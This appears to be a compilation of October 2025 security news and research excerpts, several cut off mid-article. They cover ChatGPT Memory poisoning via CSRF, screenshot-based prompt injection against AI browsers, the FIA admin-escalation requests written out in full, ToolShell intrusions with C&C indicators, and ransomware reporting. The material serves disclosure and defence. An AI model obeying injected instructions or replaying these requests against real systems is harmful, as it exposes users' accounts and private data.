Like a person’s subconscious, once the right instructions are stored inside ChatGP’s Memory, ChatGPT will be compelled to execute these instructions, effectively becoming a malicious co-conspiritor.
Moreover, once an account’s Memory has been infected, this infection is persistent across all devices that the account is used on – across home and work computers, and across different browsers – whether a user is using them on Chrome, Atlas, or any other browser. This makes the attack extremely “sticky,” and is especially dangerous for users who use the same account for both work and personal purposes.
ChatGPT Atlas Users Up to 90% More Exposed Than Other Browsers
While this vulnerability can be used against ChatGPT users on any browser, users of OpenAI’s ChatGPT browser are particularly vulnerable. This is for two reasons:
When you are using Atlas, you are, by default, logged-in to ChatGPT. This means that ChatGPT credentials are always stored in the browser, where they can be targeted by malicious CSRF requests.
ChatGPT Atlas is particularly bad at stopping phishing attacks. This means that users of Atlas are more exposed than users of other browsers.
LayerX tested Atlas against over 100 in-the-wild web vulnerabilities and phishing attacks. LayerX previously conducted the same test against other AI browsers such as Comet, Dia, and Genspark. The results were uninspiring, to say the least:
In the previous tests, whereas traditional browsers such as Edge and Chrome were able to stop about 50% of phishing attacks using their out-of-the-box protections, Comet and Genspark stopped only 7% (Dia generated results similar to those of Chrome).
Running the same test against Atlas showed even more stark results:
Out of 103 in-the-wild attacks that LayerX tested, ChatGPT Atlas allowed 97 to go through, a whopping 94.2% failure rate.
Compared to Edge (which stopped 53% of attacks in LayerX’s test) and Chrome (which stopped 47% of attacks), ChatGPT Atlas was able to successfully stop only 5.8% of malicious web pages, meaning that users of Atlas were nearly 90% more vulnerable to phishing attacks, compared to users of other browsers.
The implication is that not only users of ChatGPT Atlas are susceptible to malicious attack vectors that can lead to injection of malicious instructions into their ChatGPT accounts, but since Atlas does not include any meaningful anti-phishing protection, Atlas users are at a greater risk of exposure.
Proof of Concept: Injecting Malicious Code To ‘Vibe’ Coding
Below is an illustration of an attack vector exploiting this vulnerability, on an Atlas browser user who is vibe coding:
“Vibe coding” is a collaborative style where the developer treats the AI as a creative partner rather than a line-by-line executor. Instead of prescribing exact syntax, the developer shares the project’s intent and feel (e.g., architecture goals, tone, audience, aesthetic preferences, etc.) and other non-functional requirements.
ChatGPT then uses this holistic brief to produce code that works and matches the requested style, narrowing the gap between high-level ideas and low-level implementation. The developer’s role shifts from hand-coding to steering and refining the AI’s interpretation.
While ChatGPT offers some defenses against malicious instructions, effectiveness can vary with the attack’s sophistication and how the unwanted behavior entered Memory.
In some cases, the user may see a mild warning; in others, the attempt might be blocked. However, if cleverly masked, the code could evade detection altogether. For example, this is the subtle warning that this script received. At most, it’s a sidenote that is easy to miss within the blob of text:
• The Register
Carly Page
Thu 23 Oct 2025 //
Google has taken down thousands of YouTube videos that were quietly spreading password-stealing malware disguised as cracked software and game cheats.
Researchers at Check Point say the so-called "YouTube Ghost Network" hijacked and weaponized legitimate YouTube accounts to post tutorial videos that promised free copies of Photoshop, FL Studio, and Roblox hacks, but instead lured viewers into installing infostealers such as Rhadamanthys and Lumma.
The campaign, which has been running since 2021, surged in 2025, with the number of malicious videos tripling compared to previous years. More than 3,000 malware-laced videos have now been scrubbed from the platform after Check Point worked with Google to dismantle what it called one of the most significant malware delivery operations ever seen on YouTube.
Check Point says the Ghost Network relied on thousands of fake and compromised accounts working in concert to make malicious content look legitimate. Some posted the "tutorial" videos, others flooded comment sections with praise, likes, and emojis to give the illusion of trust, while a third set handled "community posts" that shared download links and passwords for the supposed cracked software.
"This operation took advantage of trust signals, including views, likes, and comments, to make malicious content seem safe," said Eli Smadja, security research group manager at Check Point. "What looks like a helpful tutorial can actually be a polished cyber trap. The scale, modularity, and sophistication of this network make it a blueprint for how threat actors now weaponise engagement tools to spread malware."
Once hooked, victims were typically instructed to disable antivirus software, then download an archive hosted on Dropbox, Google Drive, or MediaFire. Inside was malware rather than a working copy of the promised program, and once opened, the infostealers exfiltrated credentials, crypto wallets, and system data to remote command-and-control servers.
One hijacked channel with 129,000 subscribers posted a cracked version of Adobe Photoshop that racked up nearly 300,000 views and more than 1,000 likes. Another targeted cryptocurrency users, redirecting them to phishing pages hosted on Google Sites.
As Check Point tracked the network, it found the operators frequently rotated payloads and updated download links to outpace takedowns, creating a resilient ecosystem that could quickly regenerate even when accounts were banned.
Check Point says the Ghost Network's modular design, with uploaders, commenters, and link distributors, allowed campaigns to persist for years. The approach mimics a separate operation the firm has dubbed the "Stargazers Ghost Network" on GitHub, where fake developer accounts host malicious repositories.
While most of the malicious videos pushed pirated software, the biggest lure was gaming cheats – particularly for Roblox, which has an estimated 380 million monthly active players. Other videos dangled cracked copies of Microsoft Office, Lightroom, and Adobe tools. The "most viewed" malicious upload targeted Photoshop, drawing almost 300,000 views before Google's cleanup operation.
The surge in 2025 marks a sharp shift in how malware is being distributed. Where phishing emails and drive-by downloads once dominated, attackers are now exploiting the social credibility of mainstream platforms to bypass user skepticism.
"In today's threat landscape, a popular-looking video can be just as dangerous as a phishing email," Smadja said. "This takedown shows that even trusted platforms aren't immune to weaponization, but it also proves that with the right intelligence and partnerships, we can push back."
Check Point doesn't have concrete evidence as to who is operating this network. It said the primary beneficiaries currently appear to be cybercriminals motivated by profit, but this could change if nation-state groups use the same tactics and video content to attract high-value targets.
The YouTube Ghost Network's rise underscores how far online malware peddlers have evolved from spammy inbox bait. The ghosts may have been exorcised this time, but with engagement now an attack vector, the next haunting is only ever a click away.
iverify.io
By Matthias Frielingsdorf, VP of Research
Oct 21, 2025
iOS 26 changes how shutdown logs are handled, erasing key evidence of Pegasus and Predator spyware, creating new challenges for forensic investigators
As iOS 26 is being rolled out, our team noticed a particular change in how the operating system handles the shutdown.log file: it effectively erases crucial evidence of Pegasus and Predator spyware infections. This development poses a serious challenge for forensic investigators and individuals seeking to determine if their devices have been compromised at a time when spyware attacks are becoming more common.
The Power of the shutdown.log
For years, the shutdown.log file has been an invaluable, yet often overlooked, artifact in the detection of iOS malware. Located within the Sysdiagnoses in the Unified Logs section (specifically, Sysdiagnose Folder -> system_logs.logarchive -> Extra -> shutdown.log), it has served as a silent witness to the activities occurring on an iOS device, even during its shutdown sequence.
In 2021, the publicly known version of Pegasus spyware was found to leave discernible traces within this shutdown.log. These traces provided a critical indicator of compromise, allowing security researchers to identify infected devices. However, the developers behind Pegasus, NSO Group, are constantly refining their techniques, and by 2022 Pegasus had evolved.
Pegasus's Evolving Evasion Tactics
While still leaving evidence in the shutdown.log, their methods became more sophisticated. Instead of leaving obvious entries, they began to completely wipe the shutdown.log file. Yet, even with this attempted erasure, their own processes still left behind subtle traces. This meant that even a seemingly clean shutdown.log that began with evidence of a Pegasus sample was, in itself, an indicator of compromise. Multiple cases of this behavior were observed until the end of 2022, highlighting the continuous adaptation of these malicious actors.
Following this period, it is believed that Pegasus developers implemented even more robust wiping mechanisms, likely monitoring device shutdown to ensure a thorough eradication of their presence from the shutdown.log. Researchers have noted instances where devices known to be active had their shutdown.log cleared, alongside other IOCs for Pegasus infections. This led to the conclusion that a cleared shutdown.log could serve as a good heuristic for identifying suspicious devices.
Predator's Similar Footprint
The sophisticated Predator spyware, observed in 2023, also appears to have learned from the past. Given that Predator was actively monitoring the shutdown.log, and considering the similar behavior seen in earlier Pegasus samples, it is highly probable that Predator, too, left traces within this critical log file.
iOS 26: An Unintended Cleanse
With iOS 26 Apple introduced a change—either an intentional design decision or an unforeseen bug—that causes the shutdown.log to be overwritten on every device reboot instead of appended with a new entry every time, preserving each as its own snapshot. This means that any user who updates to iOS 26 and subsequently restarts their device will inadvertently erase all evidence of older Pegasus and Predator detections that might have been present in their shutdown.log.
This automatic overwriting, while potentially intended for system hygiene or performance, effectively sanitizes the very forensic artifact that has been instrumental in identifying these sophisticated threats. It could hardly come at a worse time - spyware attacks have been a constant in the news and recent headlines show that high-power executives and celebrities, not just civil society, are being targeted.
Identifying Pegasus 2022: A Specific IOC
For those still on iOS versions prior to 26, a specific IOC for Pegasus 2022 infections involved the presence of a /private/var/db/com.apple.xpc.roleaccountd.staging/com.apple.WebKit.Networking entry within the shutdown.log. This particular IOC also revealed a significant shift in NSO Group's tactics: they began using normal system process names instead of easily identifiable, similarly named processes, making detection more challenging.
An image of a shutdown.log file
Correlating Logs for Deeper Insight (< iOS 18)
For devices running iOS 18 or earlier, a more comprehensive approach to detection involved correlating containermanagerd log entries with shutdown.log events. Containermanagerd logs contain boot events and can retain data for several weeks. By comparing these boot events with shutdown.log entries, investigators could identify discrepancies. For example, if numerous boot events were observed before shutdown.log entries, it suggested that something was amiss and potentially being hidden.
Before You Update
Given the implications of iOS 26's shutdown.log handling, it is crucial for users to take proactive steps:
Before updating to iOS 26, immediately take and save a sysdiagnose of your device. This will preserve your current shutdown.log and any potential evidence it may contain.
Consider holding off on updating to iOS 26 until Apple addresses this issue, ideally by releasing a bug fix that prevents the overwriting of the shutdown.log on boot.
Key Takeaways
Just months after being disrupted during Operation Cronos, the notorious LockBit ransomware group has reemerged — and it hasn’t wasted time. Check Point Research has confirmed that LockBit is back in operation and already extorting new victims.
Throughout September 2025, Check Point Research identified a dozen organizations targeted by the revived operation, with half of them infected by the newly released LockBit 5.0 variant and the rest by LockBit Black. The attacks span Western Europe, the Americas, and Asia, affecting both Windows and Linux systems, a clear sign that LockBit’s infrastructure and affiliate network are once again active.
A Rapid and Confident Comeback
At the beginning of September, LockBit officially announced its return on underground forums, unveiling LockBit 5.0 and calling for new affiliates to join. This latest version, internally codenamed “ChuongDong,” marks a significant evolution of the group’s encryptor family.
The newly observed LockBit 5.0 attacks span a broad range of targets — about 80% on Windows systems, and around 20% on ESXi and Linux environments. The quick reappearance of multiple active victims demonstrates that LockBit’s Ransomware-as-a-Service (RaaS) model has successfully reactivated its affiliate base.
From Disruption to Reorganization
Until its takedown in early 2024, LockBit was the most dominant RaaS operation globally, responsible for 20–30% of all data-leak site victim postings. Following Operation Cronos, several arrests and data seizures disrupted the group’s infrastructure. Competing ransomware programs, such as RansomHub and Qilin, briefly tried to absorb its affiliates.
However, LockBit’s administrator, LockBitSupp, evaded capture and continued to hint at a comeback on dark web forums. In May 2025, he posted defiantly on the RAMP forum: “We always rise up after being hacked.” By August, LockBitSupp reappeared again, claiming the group was “getting back to work,” a statement that quickly proved true.
A Divided Underground
While LockBit regained traction on RAMP, other major forums like XSS continued to ban RaaS advertising. In early September, LockBitSupp attempted to be reinstated on XSS, even prompting a community vote, which ultimately failed.
Implications: A Familiar Threat Returns
LockBit’s reemergence underscores the group’s resilience and sophistication. Despite high-profile law enforcement actions and public setbacks, the group has once again managed to restore its operations, recruit affiliates, and resume extortion.
With its mature RaaS model, cross-platform reach, and proven reputation among cyber criminals, LockBit’s return represents a renewed threat to organizations across all sectors. September’s wave of infections likely marks only the beginning of a larger campaign — and October’s postings may confirm the group’s full operational recovery.
| Brave brave.com
Authors
Shivan Kaul Sahib
Artem Chaikin
AI browsers remain vulnerable to prompt injection attacks via screenshots and hidden content, allowing attackers to exploit users' authenticated sessions.
This is the second post in a series about security and privacy challenges in agentic browsers. This vulnerability research was conducted by Artem Chaikin (Senior Mobile Security Engineer), and was written by Artem and Shivan Kaul Sahib (VP, Privacy and Security).
Building on our previous disclosure of the Perplexity Comet vulnerability, we’ve continued our security research across the agentic browser landscape. What we’ve found confirms our initial concerns: indirect prompt injection is not an isolated issue, but a systemic challenge facing the entire category of AI-powered browsers. This post examines additional attack vectors we’ve identified and tested across different implementations.
On request, we are withholding one additional vulnerability found in another browser for now. We plan on providing more details next week.
As we’ve written before, AI-powered browsers that can take actions on your behalf are powerful yet extremely risky. If you’re signed into sensitive accounts like your bank or your email provider in your browser, simply summarizing a Reddit post could result in an attacker being able to steal money or your private data.
As always, we responsibly reported these issues to the various companies listed below so the vulnerabilities could be addressed. As we’ve previously said, a safer Web is good for everyone. The thoughtful commentary and debate about secure agentic AI that was raised by our previous blog post in this series motivated our decision to continue researching and publicizing our findings.
Prompt injection via screenshots in Perplexity Comet
Perplexity’s Comet assistant lets users take screenshots on websites and ask questions about those images. These screenshots can be used as yet another way to inject prompts that bypass traditional text-based input sanitization. Malicious instructions embedded as nearly-invisible text within the image are processed as commands rather than (untrusted) content.
How the attack works:
Setup: An attacker embeds malicious instructions in Web content that are hard to see for humans. In our attack, we were able to hide prompt injection instructions in images using a faint light blue text on a yellow background. This means that the malicious instructions are effectively hidden from the user.
Trigger: User-initiated screenshot capture of a page containing camouflaged malicious text.
Injection: Text recognition extracts text that’s imperceptible to human users (possibly via OCR though we can’t tell for sure since the Comet browser is not open-source). This extracted text is then passed to the LLM without distinguishing it from the user’s query.
Exploit: The injected commands instruct the AI to use its browser tools maliciously.
| SECURITY.COM
Threat Hunter Team
Symantec and Carbon Black
China-based threat actors also compromised networks of government agencies in countries in Africa and South America.
China-based threat actors also compromised networks of government agencies in countries in Africa and South America.
Threat Intelligence
22 Oct 2025
7 Min Read
Share
China-based attackers used the ToolShell vulnerability (CVE-2025-53770) to compromise a telecoms company in the Middle East shortly after the vulnerability was publicly revealed and patched in July 2025.
The same threat actors also compromised two government departments in the same African country during the same time period. Zingdoor, which was deployed on the networks of all three organizations, has in the past been associated with the Chinese group Glowworm (aka Earth Estries, FamousSparrow).
Another tool used in this campaign, KrustyLoader, has also previously been linked to activity by a group called UNC5221, which has been described as a China-nexus group.
The attackers also gained access to the networks of two government agencies in South America and a university in the U.S. recently. In these attacks, the attackers used other vulnerabilities for initial access and exploited SQL servers and Apache HTTP servers running the Adobe ColdFusion software to deliver their malware. Notably, in the South American victims, the attackers used the filename “mantec.exe”, possibly to mimic a Symantec filename (“symantec.exe”) in an attempt to hide their malicious activity. This binary (mantec.exe), which is a legitimate copy of a BugSplat executable, a tool used for bug tracking, was used to sideload a malicious DLL.
Evidence suggests that a state technology agency in an African country, a government department in the Middle East and a finance company in a European country were also compromised by the same attackers.
What is ToolShell?
ToolShell was patched by Microsoft in July 2025, but by the time it was patched it had already been exploited in the wild as a zero-day vulnerability. ToolShell affects on-premise SharePoint servers and gives an attacker unauthenticated access to vulnerable servers, allowing them to remotely execute code and access all content and file systems. ToolShell was a variant of another vulnerability (CVE-2025-49704) that had been patched in July 2025. Another related vulnerability (CVE-2025-53771) was also patched at the same time as ToolShell. This is a path traversal bug that allows an authorized attacker to perform spoofing over a network. It too was a variant of an older patched vulnerability (CVE-2025-49706).
Shortly after patching the vulnerabilities, Microsoft said that at least three Chinese groups had been exploiting ToolShell. Microsoft said at the time that two Chinese espionage groups had been exploiting the vulnerability - Budworm (aka Linen Typhoon) and Sheathminer (aka Violet Typhoon). In addition to this, a third China-based actor, known as Storm-2603, was also exploiting the vulnerabilities to carry out attacks in which it was distributing the Warlock ransomware.
Toolset
Malicious activity in the telecoms company in the Middle East began on July 21, 2025, just two days after patches were published for ToolShell, with the deployment of a likely webshell by the attackers.
The attackers loaded the Zingdoor backdoor onto the network by sideloading it using a legitimate Trend Micro binary. Zingdoor is a HTTP backdoor written in Go, which was first seen in April 2023, and first documented by Trend Micro in August that year being used in a campaign that they attributed to Glowworm. Zingdoor can collect system information, upload and download files, and run arbitrary commands on compromised networks. As well as Zingdoor, the attackers also deployed what appears to be the ShadowPad Trojan. The loader for the Trojan was sideloaded using a legitimate BitDefender binary (SHA256: 3fc4f3ffce6188d3ef676f9825cdfa297903f6ca7f76603f12179b2e4be90134).
ShadowPad is a modular remote access Trojan (RAT) that is closely associated with China-based APT groups. Because of its modular nature, ShadowPad can be continuously updated with new functionalities. This capability makes it a powerful tool. It is associated with various threat groups, particularly the APT41-nexus groups such as Blackfly, Grayfly and Redfly. It was documented being used by Glowworm in 2024, which was the first time that particular group had been observed using the malware. It has more recently been used in attacks where ransomware has been deployed. Typically, ShadowPad is loaded onto victim networks via DLL sideloading. DLL sideloading is a technique where the attackers use the DLL search order mechanism in Windows to plant and then invoke a legitimate application that executes a malicious DLL payload.
On July 25, KrustyLoader was dropped by the attackers. KrustyLoader was first documented in January 2024. It is an initial-stage malware, written in Rust, which has the primary purpose of delivering a second-stage payload. KrustyLoader can carry out various anti-sandbox and anti-analysis checks, can make a copy of itself and set itself up to self-delete when its activity is finished, and can decrypt and download additional malware. Its previous activity has been linked to China-based threat actors, and in earlier campaigns it was also used to download the Sliver post-exploitation framework, which is also seen deployed against this target.
Sliver is an open-source cross-platform adversary emulation/red team framework that can legitimately be used for security testing. However, it is often abused by threat actors who use it as a command-and-control framework.
A variety of publicly available and living-off-the-land tools are also used by the attackers in this activity, including:
Certutil: Microsoft Windows utility that can be used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates.
GoGo Scanner: A publicly available automated scanning engine aimed at Chinese speaking users, for use by red teams. It is available on GitHub.
Revsocks: A publicly available cross-platform SOCKS5 proxy server program/library written in C that can also reverse itself over a firewall.
Procdump: Microsoft Sysinternals tool for monitoring an application for CPU spikes and generating crash dumps, but can also be used as a general process dump utility.
Minidump: A script from the post-exploitation framework PowerSploit used for dumping processes. Attackers usually dump lsass.exe to find credentials.
LsassDumper: A utility designed to dump the Local Security Authority Subsystem Service (LSASS) process memory to a file.
An exploit for the Windows LSA Spoofing Vulnerability, CVE-2021-36942 (aka PetitPotam), was also executed. PetitPotam is an exploitation technique that allows for a threat actor within a compromised network to steal credentials and authentication information from Windows Servers such as a Domain Controller to gain full control of the domain. This is likely used for lateral movement or privilege escalation.
ToolShell impact further revealed
These attacks demonstrate that the ToolShell vulnerability was being exploited by an even wider range of Chinese threat actors than was originally thought.
There is some overlap in the types of victims and some of the tools used between this activity and activity previously attributed to Glowworm. However, we do not have sufficient evidence to conclusively attribute this activity to one specific group, though we can say that all evidence points to those behind it being China-based threat actors.
The large number of apparent victims of this activity is also notable. This may indicate that the attackers were carrying out an element of mass scanning for the ToolShell vulnerability, before then carrying out further activity only on networks of interest. The activity carried out on targeted networks indicates that the attackers were interested in stealing credentials and in establishing persistent and stealthy access to victim networks, likely for the purpose of espionage.
Indicators of Compromise (IOCs)
File indicators
6240e39475f04bfe55ab7cba8746bd08901d7678b1c7742334d56f2bc8620a35 - LsassDumper
929e3fdd3068057632b52ecdfd575ab389390c852b2f4e65dc32f20c87521600 - KrustyLoader
db15923c814a4b00ddb79f9c72f8546a44302ac2c66c7cc89a144cb2c2bb40fa - Likely ShadowPad
e6c216cec379f418179a3f6a79df54dcf6e6e269a3ce3479fd7e6d4a15ac066e – ShadowPad Loader
071e662fc5bc0e54bcfd49493467062570d0307dc46f0fb51a68239d281427c6 - Zingdoor
1f94ea00be79b1e4e8e0b7bbf2212f2373da1e13f92b4ca2e9e0ffc5f93e452b - PetitPotam/CVE-2021-36942 exploit
dbdc1beeb5c72d7b505a9a6c31263fc900ea3330a59f08e574fd172f3596c1b8 - RevSocks
6aecf805f72c9f35dadda98177f11ca6a36e8e7e4348d72eaf1a80a899aa6566 - LsassDumper
568561d224ef29e5051233ab12d568242e95d911b08ce7f2c9bf2604255611a9 - Socks Proxy
28a859046a43fc8a7a7453075130dd649eb2d1dd0ebf0abae5d575438a25ece9 - GoGo Scanner
7be8e37bc61005599e4e6817eb2a3a4a5519fded76cb8bf11d7296787c754d40 - Sliver
5b165b01f9a1395cae79e0f85b7a1c10dc089340cf4e7be48813ac2f8686ed61 - ProcDump
e4ea34a7c2b51982a6c42c6367119f34bec9aeb9a60937836540035583a5b3bc - ProcDump
7803ae7ba5d4e7d38e73745b3f321c2ca714f3141699d984322fa92e0ff037a1 – Minidump
7acf21677322ef2aa835b5836d3e4b8a6b78ae10aa29d6640885e933f83a4b01 - mantec.exe – Benign executable
6c48a510642a1ba516dbc5effe3671524566b146e04d99ab7f4832f66b3f95aa - bugsplatrc.dll
Network indicators
http://kia-almotores.s3.amazonaws[.]com/sy1cyjt - KrustyLoader C&C server
http://omnileadzdev.s3.amazonaws[.]com/PBfbN58lX - KrustyLoader C&C server
ian.sh
Ian Carroll
22.10.2025¨
We found vulnerabilities in the FIA's Driver Categorisation platform, allowing us to access PII and password hashes of any racing driver with a categorisation rating.
Introduction
With security startups getting flooded with VC funding in the past few years, some of the biggest networking events have centered themselves around the Formula 1 Grand Prix. Companies like CrowdStrike and Darktrace spend millions of dollars sponsoring teams, while others like Bitdefender have official partnerships to be a racing team's cybersecurity partner.
Having been able to attend these events by hoarding airline miles and schmoozing certain cybersecurity vendors, Gal Nagli, Sam Curry, and I thought it would be fun to try and hack some of the different supporting websites for the Formula 1 events.
This blog is part 1 of 3 in a series of vulnerabilities found in Formula 1.
Finding F1 Driver Licenses
To race in Formula 1, drivers hold an FIA Super Licence. It’s issued annually through a driver’s national motorsport authority (ASN) once they’ve met the FIA’s requirements, typically spending years in smaller races to earn Super Licence points, along with meeting minimum age thresholds and other medical/written tests.
F1 drivers often compete outside Grands Prix as well, where the FIA uses a Driver Categorisation (Bronze/Silver/Gold/Platinum) to balance teams. That categorisation is managed via the FIA portal at drivercategorisation.fia.com, which supports public self-registration for competitors to request or update their Bronze/Silver/Gold/Platinum status and submit results for review. This system is separate from the Super Licence, but many F1 drivers appear in both and receive automatic Platinum status for holding an active Super Licence.
The public login page for the Driver Categorisation portal..
After creating an account with an email and password, you are thrown into the actual application process. Normally, you will have to upload a lot of supporting documents for your request for categorization, including identity documents and racing CVs/history. However, we noticed there is a very simple HTTP PUT request that is used to update your user profile:
Copy
PUT /api/users/12934 HTTP/1.1
Host: driverscategorisation.fia.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Content-Length: 246
Content-Type: application/json
{
"id": 12934,
"email": "samwcurry@gmail.com",
"firstName": "Sam",
"lastName": "Curry",
"nickName": null
}
The HTTP request to update our profile didn't really have many interesting attributes, but the JSON returned in the response had a lot of extra values:
Copy
HTTP/1.1 200
Content-type: application/json
Content-Length: 313
{
"id": 12934,
"email": "samwcurry@gmail.com",
"firstName": "Sam",
"lastName": "Curry",
"nickName": null,
"keepNamePrivate": false,
"nickName2": null,
"birthDate": "2000-02-17",
"gender": null,
"token": null,
"roles": null,
"country": null,
"filters": [],
"status": "ACTIVATED",
"secondaryEmail": null
}
The JSON HTTP response for updating our own profile contained the "roles" parameter, something that might allow us to escalate privileges if the PUT request was vulnerable to mass assignment. We began looking through the JavaScript for any logic related to this parameter.
JavaScript from the FIA Driver Categorisation portal.
Based on the JavaScript, there were a number of different roles on the website that were intended to be used by drivers, FIA staff, and site administrators. The most interesting one was obviously admin, so we guessed the correct HTTP PUT request format to try and update our roles based on the JavaScript:
Copy
PUT /api/users/12934 HTTP/1.1
Host: driverscategorisation.fia.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Content-Length: 246
Content-Type: application/json
{
"id": 12934,
"email": "samwcurry@gmail.com",
"firstName": "Sam",
"lastName": "Curry",
"nickName": null,
"roles": [
{
"id": 1,
"description": "ADMIN role",
"name": "ADMIN"
}
]
}
Our test worked exactly as predicted. The HTTP response showed that the update was successful, and we now held the administrator role for the website.
Copy
HTTP/1.1 200
Content-type: application/json
Content-Length: 313
{
"id": 12934,
"email": "samwcurry@gmail.com",
"firstName": "Sam",
"lastName": "Curry",
"nickName": null,
"keepNamePrivate": false,
"nickName2": null,
"birthDate": "1999-10-17",
"gender": null,
"token": null,
"roles": [
{
"id": 1,
"description": "ADMIN role",
"name": "ADMIN"
}
],
"country": null,
"filters": [],
"status": "ACTIVATED",
"secondaryEmail": null
}
We reauthenticated in order to refresh our session, and upon logging in, we were shown an entirely new dashboard that was intended to be used by FIA administrators to categorise drivers, manage employees, and update server-side variables like email templates and more. We seemed to have full admin access to the FIA driver categorization website.
Accessing the driver categorisation portal as an administrator.
To validate our finding, we attempted to load a driver's profile and observed the user's password hash, email address, phone number, passport, resume, and all related PII. Additionally, we could load all internal communications related to driver categorisation including comments about their performance and committee related decisions.
Internal FIA comments about the categorisation of a professional F1 driver.
We stopped testing after seeing that it was possible to access Max Verstappen's passport, resume, license, password hash, and PII. This data could be accessed for all F1 drivers with a categorization, alongside sensitive information of internal FIA operations. We did not access any passports / sensitive information and all data has been deleted.
Disclosure timeline
06/03/2025: Initial disclosure to FIA via email and Linkedin
06/03/2025: Initial response from FIA, site taken offline
06/10/2025: Official response from FIA informing us of a comprehensive fix
10/22/2025: Release of blog post, public disclosure
lemonde.fr
Par Florian Reynaud et Martin Untersinger
Publié le 16 octobre 2025 à 06h30, modifié le 16 octobre 2025 à 10h04
En novembre 2024, la présentation de cette task force par le FBI à des policiers et des magistrats européens a choqué certains enquêteurs. Ils craignent notamment pour l’intégrité de leurs investigations.
Les policiers sont venus de toute l’Europe. En ce début novembre 2024, ils ont rendez-vous au siège d’Europol, l’organisme de coopération des polices européennes, à La Haye, aux Pays-Bas. Ils vont plancher en secret sur une enquête ultrasensible visant Black Basta, un gang de cybercriminels d’élite.
Même s’il est alors en perte de vitesse, ce groupe fait encore partie des plus dangereux au monde. Il a frappé entreprises et administrations sans épargner personne, pas même des hôpitaux : la quasi-totalité des services de police et de justice d’Europe l’ont dans le viseur. Comme souvent dans ce type de rassemblement, le puissant FBI – partenaire de longue date d’Europol – est présent. Mais au cours de la réunion, l’agent de liaison de la police fédérale américaine laisse sa place à un de ses collègues pour un exposé des plus inhabituels.
Ce dernier est venu présenter une unité secrète du gouvernement américain : le « Group 78 ». Il ira ensuite faire de même dans une deuxième réunion, à Eurojust, le pendant d’Europol où se coordonnent les magistrats. Sur la base de documents, de plusieurs sources policières et judiciaires européennes et à l’issue d’une enquête de plusieurs mois, Le Monde et Die Zeit sont en mesure de révéler l’existence de cette cellule secrète, son nom et la manière dont elle a été présentée aux enquêteurs européens.
Des enquêteurs médusés
Lors de ces deux réunions, l’agent du FBI détaille la façon dont le Group 78 entend remplir sa mission. Sa stratégie est double : d’une part, mener des actions en Russie pour rendre la vie des membres de Black Basta impossible et les forcer à quitter le territoire pour les mettre à portée des mandats d’arrêt les visant ; d’autre part, manipuler les autorités russes pour qu’elles mettent fin à la protection dont bénéficie le gang. Pour les policiers et les magistrats européens, le message est clair : les services de renseignement américains viennent de faire une entrée fracassante dans le paysage.
Une partie d’entre eux est sous le choc. D’abord parce que le Group 78 semble conscient de perturber, par ses actions, des opérations judiciaires européennes. Ensuite, des enquêteurs craignent que la stratégie de cette cellule cache des actions violentes ou illégales. Et si, grâce à ces dernières, les criminels se retrouvent à portée de mandat d’arrêt européen, cela reviendrait, pour la justice européenne, à blanchir les manœuvres des services américains. « Hors de question que je couvre ça », s’écrie auprès du Monde et de son partenaire d’enquête un magistrat européen, très remonté.
Enfin, certains reprochent au FBI d’avoir mélangé les rôles en introduisant le Group 78 dans une enceinte judiciaire où la coopération, la transparence entre alliés et le secret de l’enquête ont permis de remporter des succès majeurs dans la lutte contre la pègre numérique. Que plusieurs sources présentes aient accepté de se confier à des journalistes est un signe du malaise suscité.
Le Group 78 est apparu « dans une ou deux enquêtes, causant une colère considérable au sein de la coopération policière, dénonce auprès du Monde et de son partenaire un second magistrat spécialisé d’un autre pays européen. Nous ne savons pas exactement qui l’a fondé et quelles sont ses motivations politiques. Nous ne voulons rien avoir affaire avec ça. Nous sommes des enquêteurs : pour nous, dès qu’un groupe comme Group 78 apparaît, c’est fini. » La présentation du FBI a contraint certains enquêteurs à revoir leurs plans vis-à-vis de Black Basta, confirme une source proche du dossier.
lemagit.fr par
Valéry Rieß-Marchive, Rédacteur en chef
Publié le: 20 oct. 2025
Selon Le Monde et Die Zeit, un mystérieux « Group 78 » aurait organisé des fuites d’information sur le groupe de rançongiciel Black Basta, visant notamment à les déstabiliser. Ai-je compté parmi leurs destinataires ?
Ce jeudi 16 octobre, Le Monde et Die Zeit ont publié une enquête sur un mystérieux groupe 78 qui aurait deux objectifs principaux : « d’une part, mener des actions en Russie pour rendre la vie des membres de Black Basta impossible et les forcer à quitter le territoire afin de les mettre à portée des mandats d’arrêt les visant ; d’autre part, manipuler les autorités russes pour qu’elles mettent fin à la protection dont bénéficie le gang ».
Selon nos confrères, ces révélations « éclairent d’un jour nouveau deux événements survenus peu de temps après. À la mi-décembre, une même source anonyme contacte deux journalistes spécialisés dans la Cybercriminalité ». J’étais l’un d’eux.
L’approche
Pour moi, tout a commencé le 16 décembre 2024. Peu avant 22h, un inconnu se glisse dans mes messages directs sur X (ex-Twitter) : « je vous écris pour voir si vous êtes intéressé de savoir qui est le leader de Black Basta ».
Black Basta, c’est une enseigne de ransomware apparue au printemps 2022, moins de deux mois après l’invasion de l’Ukraine par la Russie. C’est à ce moment-là que Conti a pris ouvertement position en faveur de l’envahisseur. Une initiative qui a conduit à l’éclatement de l’enseigne et à la fuite de nombreuses données internes sensibles. De là ont émergé Akira, BlackByte, Karakurt, Black Basta ou encore Royal/BlackSuit et ThreeAM.
Je suivais de près les activités de Black Basta. J’en avais ainsi pointé un net recul durant l’été 2024. L’enseigne était globalement discrète malgré quelques victimes de renom. Ses habitudes de négociation suggéraient l’existence d’une poignée de sous-groupes, dont certains aux processus plus structurés que d’autres. De quoi rappeler l’organisation des Conti ou Akira.
En France, Black Basta s’est notamment attaqué à Oralia en avril 2022, puis H-Tube, l’étude Villa Florek, Envea, Dupont Restauration, et Baccarat. Au total, plus de 520 victimes de Black Basta sont publiquement connues, contre plus de 350 pour Conti.
En novembre 2023, Elliptic et Corvus Insurance estimaient que Black Basta avait encaissé plus de 100 millions de dollars de rançons en près de deux ans d’activité.
L’individu qui m’a contacté, c’est un certain « Mikhail ». Bien sûr que j’étais intéressé par ce qu’il avait à dire. J’avais suivi des mouvements de fonds, en Bitcoin, confirmant les liens entre Conti et Black Basta. Il m’apparaissait probable que l’on allait parler de celui qui se faisait appeler « tramp ». Mon intuition était juste. Les premiers échanges de courriels ont commencé dans la foulée de la prise de contact initiale.
